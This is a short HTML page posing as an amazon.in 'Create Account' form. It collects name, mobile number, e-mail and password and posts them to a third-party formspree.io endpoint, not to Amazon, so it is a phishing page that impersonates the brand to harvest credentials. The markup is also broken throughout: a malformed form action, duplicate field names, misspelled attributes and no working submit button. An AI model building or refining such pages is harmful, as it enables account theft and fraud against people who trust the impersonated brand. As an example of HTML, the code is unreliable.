<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>


<form style="border: 1px solid;"action="/https://formspree.io/f/xqkneabo">

<h1 style="border"></h1>

 <h1>amazon.in</h1>
<h1>Create Account</h1>

<h1>Your Name</h1>
<input type="textbox" name="n1" value=""
max length="15">

<h1>Mobile number</h1>
<input ntype="textbox"name="n1" value="" >
<input type="textbook" name="n1" value="" maxlength="123456789">



<h1>E-mail</h1>
<input type="textbox" name="n1" value="">


<h1>Password</h1>
<input type="textbox" name="n1" value="Atleast 6 character"
max length="1">


<h1>we will send u text to verify your phone.</h1>
<h1>Message and Data rates may apply.</h1>

<h1>Submit</h1>
<input type="textbox bgcolor=yellow" name="n1" value="Continue"
max length="">




</body>

</html>